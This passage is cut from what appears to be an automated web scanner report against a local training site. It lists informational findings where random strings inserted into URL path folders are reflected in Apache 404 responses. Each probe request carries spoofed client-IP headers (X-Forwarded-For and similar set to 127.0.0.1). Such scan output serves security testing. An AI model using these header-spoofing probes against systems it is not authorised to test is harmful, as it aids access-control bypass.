X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/fi/source4hibzo76o8/ was not found on this server.</p>
...[SNIP]...
19.165. http://localhost/examplewebiste/vulnerabilities/javascript/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesjciby81m4r/javascript/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:30 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesjciby81m4r/javascript/ was not found on this server.</p>
...[SNIP]...
19.166. http://localhost/examplewebiste/vulnerabilities/javascript/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascriptl5sduffr5c/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascriptl5sduffr5c/ was not found on this server.</p>
...[SNIP]...
19.167. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesexzhdxtty1/javascript/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesexzhdxtty1/javascript/help/ was not found on this server.</p>
...[SNIP]...
19.168. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascriptzd0lgbqfk5/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascriptzd0lgbqfk5/help/ was not found on this server.</p>
...[SNIP]...
19.169. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascript/helpf9w8tk7vfh/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascript/helpf9w8tk7vfh/ was not found on this server.</p>
...[SNIP]...
19.170. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities9irodwy9z8/javascript/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities9irodwy9z8/javascript/source/ was not found on this server.</p>
...[SNIP]...
19.171. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascriptqoop882ofx/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascriptqoop882ofx/source/ was not found on this server.</p>
...[SNIP]...
19.172. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascript/sourceam62av3cbv/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascript/sourceam62av3cbv/ was not found on this server.</p>
...[SNIP]...
19.173. http://localhost/examplewebiste/vulnerabilities/sqli/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesyigyr51i5e/sqli/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesyigyr51i5e/sqli/ was not found on this server.</p>
...[SNIP]...
19.174. http://localhost/examplewebiste/vulnerabilities/sqli/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqlilaqyyjfq4r/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqlilaqyyjfq4r/ was not found on this server.</p>
...[SNIP]...
19.175. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesttmr12s3ho/sqli/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesttmr12s3ho/sqli/help/ was not found on this server.</p>
...[SNIP]...
19.176. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli2l5ic9f67n/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli2l5ic9f67n/help/ was not found on this server.</p>
...[SNIP]...
19.177. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli/helpq05gjmsmp3/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:14 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli/helpq05gjmsmp3/ was not found on this server.</p>
...[SNIP]...
19.178. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesu9od4a97rw/sqli/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesu9od4a97rw/sqli/source/ was not found on this server.</p>
...[SNIP]...
19.179. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli6aehfni02o/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli6aehfni02o/source/ was not found on this server.</p>
...[SNIP]...
19.180. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli/source4bt5olp81y/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli/source4bt5olp81y/ was not found on this server.</p>
...[SNIP]...
19.181. http://localhost/examplewebiste/vulnerabilities/sqli_blind/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesse18i5hxqs/sqli_blind/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:37 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesse18i5hxqs/sqli_blind/ was not found on this server.</p>
...[SNIP]...
19.182. http://localhost/examplewebiste/vulnerabilities/sqli_blind/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blinda85e782qfp/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blinda85e782qfp/ was not found on this server.</p>
...[SNIP]...
19.183. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesjro5u3i1xq/sqli_blind/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesjro5u3i1xq/sqli_blind/help/ was not found on this server.</p>
...[SNIP]...
19.184. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blindoou2cd0g65/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:44 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blindoou2cd0g65/help/ was not found on this server.</p>
...[SNIP]...
19.185. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blind/helpxtcjajkdx0/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blind/helpxtcjajkdx0/ was not found on this server.</p>
...[SNIP]...
19.186. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiestymkvvcwlf/sqli_blind/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiestymkvvcwlf/sqli_blind/source/ was not found on this server.</p>
...[SNIP]...
19.187. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blind68diq4aq9x/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:52 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blind68diq4aq9x/source/ was not found on this server.</p>
...[SNIP]...
19.188. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blind/sourcexsbrcttd52/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
